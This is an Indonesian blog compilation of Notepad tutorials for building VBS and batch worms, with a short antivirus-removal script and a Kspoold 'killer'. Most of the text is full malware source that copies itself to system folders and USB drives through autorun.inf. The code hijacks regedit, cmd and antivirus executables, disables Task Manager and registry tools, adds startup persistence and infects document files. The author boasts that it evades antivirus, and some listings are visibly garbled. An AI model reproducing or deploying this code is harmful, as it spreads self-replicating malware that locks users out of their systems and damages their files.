"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- 3rc4n.dll.vbs" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe" if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama 3rc4nms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan ERCAN-X.VBS di komputer Anda.
Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka adalah "Notepad"
SEKARANG KITA BUAT ANTINYA VIRUSNYA :
[Version]
Signature="$Chicago$"
Provider=Ercan
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, "INTERNET EXPLORER"
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger
Save as dangan kata ‘’verdhy.vbs’’ (tanpa tanda petik)
virus dibawah ini bisa menduplikasikan file
”Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus”
on error resume next
”Dim (pendeklarasian) kata-kata berikut ini”
dim rekursif,winpath,flashdrive,fs,mf,atr,tf,sina,nt,check,sd
”Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information”
atr = “[autorun]” & vbcrlf & “shellexecute=wscript.exe sinaxxx.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekursif = rekursif & text.readline
rekursif = rekursif & vbcrlf
loop
do
”Menduplikasikan diri untuk menjadi file induk di Windows Path (example: C:\Windows)”
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\SINAXXX.vbs”)
tf.attributes = 32
set tf = fs.createtextfile(winpath & “\SINAXX.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(winpath & “\SINAXXX.vbs”)
tf.attributes = 39
“Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok dan Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket”
for each flashdrive in fs.drives
”Perintah untuk mengeCek Drive”
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
”membuat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\”
set tf = fs.getfile(flashdrive.path &”\SINAXXXa.vbs”)
tf.attributes = 32
set tf = fs.createtextfile(flashdrive.path &”\SINAXXX.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(flashdrive.path &”\SINAXXX.vbs”)
tf.attributes = 39
“Membuat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)”
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf = fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 39
end if
next
”Memanipulasi Registry”
set sina = createobject(”WScript.Shell”)
”Ubah CAPTION Internet Explorer menjadi komputer Anda terinfeksi Vrs SINAXXX”
sina.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”komputer Anda terinfeksi Vrs SINAXXX”
”Set agar file hidden tidak ditampilkan di Explorer”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\Advanced\Hidden”, “1″, “REG_DWORD”
”Hilangkan menu Find, Folder Options, Run, LogOff, dan memblokir Regedit dan Task Manager”
sinaRegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoFind”, “1″, “REG_DWORD”
sina.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoRun”, “1″, “REG_DWORD”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoLogOff”, “0″, “REG_DWORD”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
”Mendisablekan klik kanan”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
”Memunculkan Pesan Setiap Windows Startup”
sina.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption”,
“SINAXXX.”
sina.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”,
“kami dari keluarga SINA memohon maaf atas virus SINAXXX !!!!”
”Mengaktifkan virus sinaxxx.vbs setiap Windows Startup”
sina.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”,
windowpath & “\SINAXXX.vbs “
“Menghilangkan menu Close”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, “0″, “REG_DWORD”
”Mengubah RegisteredOwner dan Organization”
sina.regwrite“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\RegisteredOrganization”, “The SINAXXX”sina.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”SINAXXX”
”Akhir dari Kode”
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
untuk membuat Virus dari litsing diatas. kamu cukup meng-COPY Listing tersebut kedalam NOTPED dan kemudian
di SAVE dengan nama file yang berektensi vbs misal : sinaxxx.vbs.
PERLU DI PERHATKAN !!!!!
SETALAH KAMU COPY LISTING TSB JANGAN LUPA MENGHAPUS KOMENTARNYA ..YANG DI APIT TANDA ( “ ) KUTIP.!!!!
Membuat Anti virus Kspoold dgn NotePad
Virus Kspoold sebenernya bukan virus yg merusak Sistem.Mereka tidak memBlok fitur2 Windows seperti Task Manager,Run,Registry Editor dll.Tapi mereka meng-Infect file2 Word,Exel dll.Jadi pembuatan removalnya-pun lebih mudah.Tapi tidak ada salahnya kita belajar untuk membuat Anti-Virus Kspoold kita sendiri...ya kan?Sekarang kita akan membuat Kspoold removal hanya dng berbekal NotePad.
Echo off
Cls
REM - Ubah Warna
Color A
REM - Ubah Judul
Title Kspoold Killer * By vErdHy (Atau nama anda sendiri)
REM - Masuk ke Direktori Sistem
%SYSTEMDRIVE%
cd %SYSTEMROOT%\System32
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo KSPOOLD KILLER
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo After you press any key on your keyboard, i do...
Echo - Removing Related Registry
Echo - Stopping Kspoold Process
Echo - Deleting Kspoold file in the system directory
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo.
Pause
Echo.
REM - Hapus Registry yg di buat sebagai service virus
Reg delete "HKEY_MACHINE_\SYSTEM\ControlSet001\Service\KspooldDaemon" /f
Reg delete "HKEY_MACHINE_\SYSTEM\ControlSet002\Service\KspooldDaemon" /f
Reg delete "HKEY_MACHINE_\SYSTEM\CurentControlSet\Service\KspooldDaemon"/f
REM - Hentikan Proses Virus
TaskKill /IM Kspoold.exe /F /T
REM - Set Atribut file Virus menjadi normal
Attrib -s -h -r Kspoold.exe
REM - Hapus file Virus
Del Kspoold.exe
Cls
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo KSPOOLD KILLER
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo After you press any key on your keyboard, i do...
Echo - Removing Related Registry
Echo - Stopping Kspoold Process
Echo - Deleting Kspoold file in the system directory
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo.
Echo Press any key to continue...
Echo.
Echo Well done -The "Kspoold" was completely removed
Echo.
Pause
Copy paste Script di atas ke dalam NotePad, dan simpan sebagai
‘’Verdhy Kspoold.BAT’’ (tanpa tanda petik)
Setelah di simpan, silakan jalankan dng cara mengKlik dua kali pada file Verdhy Kspoold.BAT
1. Memasukkan virus kedalam flasdis
11 desember 2009
Penulis: verdhy • Kategori Artikel: Cracking, Virus
Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.
Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :
‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next
‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘//–Manipulasi Registry–//
set kalong = createobject(”WScript.Shell”)
‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”
‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : verdhy.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.
=====================================================================
2. Virus yang satu ini harus disimpan dengan nama ‘’verdhy.exe.vbs’’ (tanpa tanda petik)
AWAS…!!!!
virus ini sangat berbahaya…
apapun yang terjadi bukan tanggungan saya…
Klik star buka run lau klik notepad atau bias juga langsung dengan buka notepad
Lalu copy paste scrip di table ini
‘El Magnifico MAN
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,”"
rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
if check 1 then
Wscript.sleep 100000
end if
loop while check1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
do while year(now) >= 2008
WScript.sleep 20000
msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _
“ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _
“dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _
“iko permainan yang paten ma dunsanak” & vbcrlf & _
vbcrlf & vbcrlf & _
” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _
” aaa kini saaiknyo ma dunsanak”
loop
Jangan lupa di save dengan mengklik FILE-SAVE tuli namanya ‘’verdhy.exe.vbs’’
================================================================
3. Virus ini efeknya gak terlalu bahaya …
Evek dari virus ini Cuma mengganti tampilan dari windows …
Tetapi cukup bikin kaget juga …!!!
Tapi yang penting tidak terdeteksi sama anti virus (setau saya)
Ini hanya bias bekerja pada WINDOWS XP
Caranya:
-buka notepad lalu tulis (copy paste … tapi di edit dulu yaa … ) scrip didalam table ini
@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f
- lalu di SAVE AS ALL FILES dengan exstensi .bat (verdhy.bat)
- buat Autorun.inf dengan script:
[autorun]
open=verdhy.bat
- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya
Catatan:
1. Ini hanya untuk pembelajaran saja
2. Kami tidak bertanggung jawab atas penyalah gunaan Artikel di atas
3. Selamat bersenang-senang
note:
- jangan disalahgunakan …
- maaf kalau pernah diposting
- maaf lagi kalau salah tempat untuk posting,….maklum member baru and masih amatir …
- lagi-lagi maaf kalau ada yang salah, and mohon dikoreksi …
- kalau mau buat anti virusnya tinggal di modifikasi nilainya …
Sumber : http://www.yogyafree.net/forum2/viewtopic.php?t=11281
4. Virus adalah suatu hal yang pasti tidak disukai orang banyak,maka biasanya kalau kompi kena Virus,Ufh menyebalkan banget kan ???
Maka tidak ada salahnya kita buat virus kecil-kecilan,karena hal kecil bisa menjadi yang besar. Sekalian tambah wawasan mengenai seluk beluk “Si Perusak” alias viruszz …
karena belajar itu menyenangkan apalagi yang iseng-iseng. [hheeheee]
Oke langsung tancep aja, cuy .,….
1. Buka Notepad [ terserah lewat mana saja bisa kok,missal di Run>> ketik Notepad>>bLAA udh Kan???
Copy script dibawah ini . . .
Rem sidoarjocity4154802560
On Error Resume Next
Dim Reg, fso, Induk
Set Reg = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
Set Induk = fso.GetFile(Wscript.ScriptFullName)
If Induk <> Reg.SpecialFolders("AppData") & "\blukutuk.vbs" then
If fso.fileExists(Left(Induk, Len(Induk) - 4)) Then
Reg.Run (Reg.RegRead("HKCR\" & BacaHandle("doc") & "\shell\Open\command\") & " " & chr(34) & Left(Induk, len(Induk)-3) & chr(34))
Else
Reg.Run (Reg.RegRead("HKCR\" & BacaHandle("doc") & "\shell\Open\command\") & " " & chr(34) & chr(34))
End If
End If
AutoFlash
Sebar1
Sebar2
Samar
Pertahanan
ShortCut
SerangFile (Left(Induk, InStrRev(Induk, " \ ")))
SerangFolder (Left(Induk, InStrRev(Induk, " \ ")))
SerangDrive("c:\")
SerangDrive("d:\")
SerangDrive("e:\")
SerangDrive("f:\")
SerangDrive("g:\")
AlwaysRun
SerangRecent
Sub AutoFlash
On Error Resume Next
Dim flashdrive, auto, tf1, tf2
For Each flashdrive In fso.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
Set auto = fso.CreateTextFile(flashdrive.Path & ("\AutoRun.inf"), True)
auto.Write ("[autorun]"& vbcrlf & "shellexecute=wscript.exe sidoarjo hot.vbs")
auto.Close
set tf1=fso.getfile(flashdrive.path & "\AutoRun.inf")
tf1.Attributes = 32
Induk.Copy (flashdrive.Path & "\sidoarjo hot.vbs")
set tf2=fso.getfile(flashdrive.path & "\sidoarjo hot.vbs")
tf2.Attributes = 32
End If
Next
End Sub
Sub SerangDrive (Lokasi)
On Error Resume Next
Dim drv
If fso.DriveExists(Lokasi) Then
Set drv = fso.GetDrive(fso.GetDriveName(Lokasi))
If drv.DriveType = 1 Or drv.DriveType = 2 Then
CopyVbs (Lokasi & "\lapindo.vbs")
SerangFolder (Lokasi)
End If
End If
End Sub
Sub SerangFolder (Lokasi)
On Error Resume Next
If Lokasi = "" Then Exit Sub
if Lokasi = Left(Reg.SpecialFolders("Desktop"),3) & "Windows" then exit sub
Dim target
For Each target In fso.GetFolder(Lokasi).SubFolders
CopyVbs(target & "\bacalah aku.vbs")
SerangFile (target)
SerangFolder2 (target)
Next
End Sub
Sub SerangFolder2 (Lokasi)
On Error Resume Next
If Lokasi = "" Then Exit Sub
if Lokasi = Left(Reg.SpecialFolders("Desktop"),3) & "Windows" then exit sub
Dim target
For Each target In fso.GetFolder(Lokasi).SubFolders
CopyVbs(target & "\duit.vbs")
SerangFile (target)
SerangFolder3 (target)
Next
End Sub
Sub SerangFolder3 (Lokasi)
On Error Resume Next
If Lokasi = "" Then Exit Sub
if Lokasi = Left(Reg.SpecialFolders("Desktop"),3) & "Windows" then exit sub
Dim target
For Each target In fso.GetFolder(Lokasi).SubFolders
CopyVbs(target & "\Hasil rapat.vbs")
SerangFile (target)
Next
End Sub
Sub SerangFile (Lokasi)
On Error Resume Next
Dim target
For Each target In fso.GetFolder(Lokasi).Files
If lcase(Right(target,3))="doc" then
if Left(target,2)<> "~$" then CopyVbs(target & ".vbs")
HilangFile (target)
End If
If lcase(Right(target,3))="xls" or lcase(Right(target,3))="ppt" or lcase(Right(target,3))="pdf" or lcase(Right(target,3))="rtf" or lcase(Right(target,3))="rar" or lcase(Right(target,3))="zip" or lcase(Right(target,3))="jpg" or lcase(Right(target,3))="gif" or lcase(Right(target,3))="bmp" then
if Left(target,2)<> "~$" then CopyVbs(Left(target, len(target)-3) & "vbs")
End If
If lcase(Right(target,4))="docx" or lcase(Right(target,4))="xlsx" or lcase(Right(target,4))="pptx" then
if Left(target,2)<> "~$" then CopyVbs(Left(target, len(target)-4) & "vbs")
End If
if lcase(Right(target,3))="vbs" then KillVBS(target)
Next
End sub
Sub Pertahanan
On Error Resume Next
Reg.RegWrite "HKCR\inffile\shell\Install\command\", "logoff.exe"
Reg.RegWrite "HKCR\regfile\shell\open\command\", "logoff.exe"
Reg.RegWrite "HKCR\VBSFile\Shell\Edit\Command\", "logoff.exe"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "0", "REG_DWORD"
